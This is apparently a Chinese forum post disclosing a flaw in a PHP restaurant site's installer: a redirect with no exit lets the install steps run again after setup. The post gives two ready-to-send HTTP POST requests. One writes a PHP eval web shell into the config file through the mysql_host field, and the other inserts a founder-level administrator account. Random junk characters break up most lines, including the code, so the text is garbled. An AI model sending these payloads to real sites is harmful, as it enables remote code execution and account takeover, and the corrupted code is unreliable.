问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。, Y# c* {- \% P( U I% z5 j
: b6 x j5 F) z8 C, {% ~
<?php- t0 I7 O' C+ [: z) d# r
if(file_exists("../install.lock"))
. L+ D7 o) @# j8 F{4 B9 f8 \ u! {) U
header("Location: ../");//没有退出% c: E) A8 _2 S, F2 E; F
}
2 K1 [5 ? S- ~
m/ h9 a) W- M" W B//echo 'tst';exit;
* j- j K" V! |4 ?3 N) trequire_once("init.php");
9 d {8 X; }% c' K. l5 s3 j4 jif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
# A; g+ R+ c8 c2 l{
/ U6 J: G7 g+ K- Z6 K3 L5 k可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
+ P) \, j/ D3 S
3 ~ P' y! L1 {" u: m1、getshell(很危险)
5 W* Q, J' P+ u) K3 ^% _- Uif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
+ H: p; S# k9 O( D$ X |{: F# s f% ^; [4 m
$smarty->assign("step",1);
* L) H3 X P, Y% q& U$smarty->display("index.html");
" W3 K7 c1 c4 u. U7 M0 B/ J}elseif($_REQUEST['step']==2)
# a' } W) P+ v" w+ \2 J{
5 \) Q3 o/ N! k $mysql_host=trim($_POST['mysql_host']);1 a0 O1 f( K7 k2 n! ~7 t1 p, M
$mysql_user=trim($_POST['mysql_user']);
$ ?+ `6 A4 i! S' @0 [$ j$ u% C $mysql_pwd=trim($_POST['mysql_pwd']);
( Q4 k$ Y4 l: |7 `' m $mysql_db=trim($_POST['mysql_db']);
" _5 S" ?+ [+ X0 b$ W; |: b $tblpre=trim($_POST['tblpre']);
+ x. |$ K+ H$ Z $domain==trim($_POST['domain']);- G- \" |8 l5 l
$str="<?php \r\n";9 L5 P$ v/ Y5 R$ m
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
) L7 R, i e& n) B& L1 K $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";. d5 l3 L7 `: j2 l1 _3 z3 ` g
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";( r7 ~8 X0 D# |: W
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
% x# Q: A7 S9 \( Q& h$ ~ $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
! Z# ]* F+ {2 @' b; P $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
5 B9 L7 Q* g/ W+ H3 M' H7 T) t $str.='define("DOMAIN","'.$domain.'");'."\r\n";
2 g% t t7 D* P$ a $str.='define("SKINS","default");'."\r\n";
3 e/ G9 b9 I7 W/ ^' v $str.='?>';* R; L, v# A8 m% H$ j. @" |
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
. k7 a/ Q; |3 d" w! C+ D9 E4 A上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马" O$ L! H1 V5 d. d- ^
POST /canting/install/index.php?m=index&step=2 HTTP/1.16 z$ x6 v3 U2 P$ ]9 M# u3 |
Host: 192.168.80.129 I8 I* Q0 v* O' l, B: U7 |) v0 J
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.06 p( X; i& Z. Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
0 q6 E" j7 p" M& kAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
: k+ @/ G/ y9 s# ?Accept-Encoding: gzip, deflate5 A% \2 K% p( M. a1 I
Referer: http://192.168.80.129/canting/install/index.php?step=1
$ ~+ V& j8 I6 Q) \( f! ECookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
* w% r. D5 \7 [3 G, z% ]Content-Type: application/x-www-form-urlencoded
5 M. P& d' r) P- A" k6 R! aContent-Length: 126
% Z4 w6 T% {* ?/ i " {/ z: r' _5 W" x
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD( ^" r5 @ v Q/ A
但是这个方法很危险,将导致网站无法运行。
- W* R) R: K( p8 b/ ~
4 i" s/ L' ~. q# S2、直接添加管理员+ m0 t: U& ~- _8 M: ?# U6 u
( n w8 `% }& a; L/ [, }elseif($_REQUEST['step']==5)6 n- S: G9 k- n @# E; r1 S
{: H' b* r- W1 j
if($_POST)
7 X3 d. C% {- q4 Y: y: t { require_once("../config/config.inc.php");. L" r6 p: r! ~* R. p3 M) F U) [1 U; w
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
, u- J3 h+ T5 I1 A9 ~( n/ O0 G f mysql_select_db(MYSQL_DB,$link);
' U# ^' W# ?% z; }. Q" i mysql_query("SET NAMES ".MYSQL_CHARSET );
- L6 H- @$ m" q5 a/ ` mysql_query("SET sql_mode=''");
x' |: X" O; w% C; A' {
' z! K& H0 \' B: _! c5 S- K $adminname=trim($_POST['adminname']);
4 k& Y! {6 C: `, M; P, I" ], | $pwd1=trim($_POST['pwd1']);5 ?' p7 S0 v% ~# E L- t0 n
$pwd2=trim($_POST['pwd2']);2 F: J/ d' u) s: K. ]/ I U: b0 v6 F! f! B
if(empty($adminname))1 l, r9 T6 V8 _4 s
{
: d/ O$ i" k" c
8 ]4 a& |; r& y5 @ echo "<script>alert('管理员不能为空');history.go(-1);</script>";
/ \( _8 O" r7 U% w" | exit();% ^/ D! m5 {7 l; b3 f( y4 m
} }: r6 g% f/ O5 {
if(($pwd1!=$pwd2) or empty($pwd1))# [) a( O9 i, ~
{
/ u0 X4 N7 c5 r. \* E& C" U echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
7 o" m0 W7 ^4 O1 M9 B# a. i* B7 k }
: k5 B) v) d# k mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
" \/ B+ r ^ R- }, n0 d }1 \- d0 J" ~9 o
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:! {/ m% g. w$ q/ u( c' V9 \
POST /canting/install/index.php?m=index&step=5 HTTP/1.15 Q5 Q% \' S/ @# H0 p
Host: 192.168.80.129
9 ^, t, x, o3 ~User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
2 C3 H6 n8 L g& d# N1 n5 H: ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
8 ^3 l9 M% F9 o5 v2 p# [" S3 q. MAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.39 ?4 P5 W9 N( H( {1 D$ \& ^" d& k
Accept-Encoding: gzip, deflate
+ I! a, `; }9 n+ }5 d6 l* I+ NReferer: http://www.2cto.com /canting/install/index.php?step=1; v/ \' W* `; Y$ y0 A
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
# @2 e- p' t ~Content-Type: application/x-www-form-urlencoded
3 o7 @1 l- W5 ~, |8 F" T6 i/ B: wContent-Length: 46
* C: O9 P; t$ P6 K1 d
3 }+ C$ r6 m: U3 Z$ d* {8 F' Jadminname=qingshen&pwd1=qingshen&pwd2=qingshen% N1 l1 ~* g! i0 | E% y8 [7 y
|
发表于 2012-12-4 11:13:44
收藏
支持
反对